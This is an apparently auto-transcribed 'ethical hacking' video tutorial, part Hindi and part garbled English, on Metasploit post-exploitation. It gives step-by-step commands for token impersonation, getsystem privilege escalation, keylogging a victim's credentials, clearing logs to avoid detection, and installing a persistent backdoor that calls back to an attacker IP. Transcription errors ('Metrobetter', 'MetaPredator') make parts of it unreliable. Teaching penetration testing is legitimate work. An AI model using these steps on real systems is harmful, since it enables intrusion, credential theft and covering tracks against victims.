हेलो फ्रेंड्स, टुडे वी आर गोइंग टू डिस्कस एथिकल हैकिंग कोर्स पार्ट 9, एस्केलेटिंग प्रिविलेजेस। इन दिस वीडियो वी आर गोइंग टू डिस्कस फॉलोइंग टॉपिक। फर्स्ट इज यूजिंग इम्पर्सनेशन टोकन्स, लोकल प्रिविलेजेस एस्केलेशन अटैक, कलेक्टिंग द विक्टम्स डेटा, क्लियरिंग अप द टास्क, क्रिएटिंग अ परसिस्टेंट बैकडोर। वंस वी गेन एक्सेस टू द कंप्यूटर दैट वी वुड लाइक टू अटैक, इट्स इम्पोर्टेंट दैट वी एस्केलेट अवर प्रिविलेजेस एज मच एज पॉसिबल। जनरली वी गेन एक्सेस टू यूजर अकाउंट दैट हैज़ लोअर प्रिविलेजेस, हाउएवर अवर टारगेट अकाउंट मे बी द एडमिनिस्ट्रेटर अकाउंट। सो इन दिस वीडियो वी विल एक्सप्लोर वेरियस वे टू एस्केलेट अवर प्रिविलेजेस। सो लेट्स बिगिन विथ फर्स्ट यूजिंग इम्पर्सनेशन टोकन। In this session, we will impersonate another user on a network by using impersonation tokens. Token contain the security information of a login session and identify the user, the user group and the user privileges. When a user logged into a Windows system, they are giving an access token as part of their authenticated session. Token impersonation allow us to escalate our privileges by impersonating that user. We begin our exploration of impersonation token for Metrobetter cell. You will have to use Metasploit to attack a host into order to gain Metrobetter cell. You can also use Ethical Hacking Course Part 7 Exploiting Vulnerabilities to gain access to a host using Metasploit. So here I already get Metrobetter session. So first check sessions-l command. And you can see here, so we get this session using session-i and session id 1, and you can see here we get Metrobetter cell. From Metrobetter we can begin the impersonation process by using incognito. So use and putting extension successfully. Display the help file for incognito by issuing the help command. So type help. You will notice that we have several options available here. Next, we want to get a list of available users who are currently logged into the system or have had access to the system recently. We do this by executing the list underscore token command with the -u option. So list dash token dash u, and you can see here. Finally, we run the shell command. Next, we run the impersonation attack. So impersonate underscore token and copy this and paste this and just make another backward slash and press enter. And you can see application token available. Successfully impersonation user to this user. Finally, we run a shell command. If we are successfully, we are now using the current system as another user. In this session, we will begin with compromised host and then use Metrobetter to impersonate the token of another user on the machine. The goal of the impersonation attack is to choose the highest level of user possible, preferable someone who is also connect across the domain and use their account to dive further into the network. So next is local privilege escalation attack. In this session, we will escalate privileges on a compromised machine. Local privileges escalation allow us to gain access to system or domain user account utilizing the current system to which we are attacked. Let's begin the process of performing local privileges escalation attack from Metrobetter cell. You will have to use Metasploit to attack a host in order to gain Metrobetter cell. Here we already have Metrobetter cell. Next is to view the help file for the get system command. So we run get system -h command, and you can see you can use different options along with get system command. I just use get system without any argument, and we got the system via technique 1. That means we successfully perform a escalation attack. In this session, we use Metrobetter to perform a local privileges escalation attack on our victim machine. We begun the receipt from Metrobetter cell. We then ran the get system command that allow MetaPreter to try and evaluate our credential on the system. If successful, we will have system level access to our victim's machine. We move to next topic, locating the victim's data. In this session, we will explore how to collect data from victim by using Metasploit. There are several ways to complete this task, but we will explore record users' keystrokes on the compromise system. Collecting a victim's data allows us to potentially gain additional information that we can use for further exploit. For example, we will collect keystrokes entered by user on compromised host. Once you have gained access to your victims using Metasploit with MetaPreter payload, we wait for your MetaPreter prompt to display. Next is we execute the following command to begin the keystroke logger. So we start keystroke login by typing keystroke scan underscore start, and keystroke sniffer will be started. Now suppose this is your victim machine, type notepad here. Suppose our victim logged into website using credentials pargov and password is Tundel. Finally, we issue the key scan dump command to output user's keystroke to the screen. So keystroke scan dump command, and you can see here. To stop keystroke scanning, just type keystroke scan underscore stop to stop it, and you can see stopping the keystroke sniffer. There are several different ways you can approach collecting data from victim's machine. In this recipe, we use Metasploit and MetaPreter key scan to record keystroke. Now we move to next, clearing up the task. In this session, we will use Metasploit to erase our task that we perform on victim machine. So clearing up after compromising a host is an extremely important step, because you don't want to get through all of the trouble of gaining access only to get caught. Luckily for us, Metasploit has way for us to clean up our task very easily. We need to run the IRB in order to begin the log removal process. So type IRB and we load Ruby interpreter cell. Next we tell the IRB which log R would be like to remove. There are some available choice you can see here on screen. For our process, we will clear them all. You will have to type this one at a time. So now we execute our command to erase the log file. So log dot clear. That's it. With just a few command, we have been able to cover our task. So in this session, we use MetaPreter to cover our task on a compromised host. We begun the receipt from MetaPreter cell and started IRB Ruby interpreter cell. Next, we specify exactly which file we want to have removed and concluded the receipt by issuing the log.clear command to clear the log file. So type exit for exit out from IRB cell. Next is creating a persistent backdoor. So in this session, we will create a persistent backdoor using Metasploit persistence. Once you have succeeded in gain access to compromised machine, you will want to explore way to regain access to the machine without having to break into it again. If the user of the compromised machine does something to disrupt the connection, such as reboot the machine, the use of backdoor will allow to connect, re-establish your machine. This is where create backdoor comes in handy, because it allows you to maintain access to a previously compromised machine. Once you have gained access to your victim using Metasploit exploit with MetaPreter payload, we wait for your MetaPreter prompt to display. Here we already have. Next, we need to run persistence in order to set up our backdoor. We open the help file. So run persistence-h command, and you can see here persistence backdoor has many options, as you can see. Now we execute our command to use set up the backdoor. So run persistence dash capital U for automatically start the agent when the user logs on, dash A for automatically start matching multi-handler to connect to the agent, dash I the interval in second between each connection attempt -8090 and -R for the IP of system running Metasploit listening for a connect back. That means attacker IP address. That means we need to enter here attacker IP address, which is our IP address. So just find our IP address. If config command, and you can see here it's our IP address. So type this IP here 192.168.1.128 and press enter. And you can see here our backdoor process is now set. If successfully, you will notice that you have second MetaPredator session, and you can see here MetaPredator session 2 open, which means we will successfully set up our backdoor to victim machine. In this session, we will use MetaPredator to set a persistence backdoor. We begin the receipt after having compromised the host and obtaining a MetaPredator shell. We then explore some of the available option for persistent by reviewing its help file. Finally, we complete the installation of backdoor by running the installation command and setting its option. So that's all about escalating privileges. You can do much more things with Metasploit framework. Please share your feedback if you would like more videos or course on Metasploit framework. Thanks for watching this video. Thank you so much.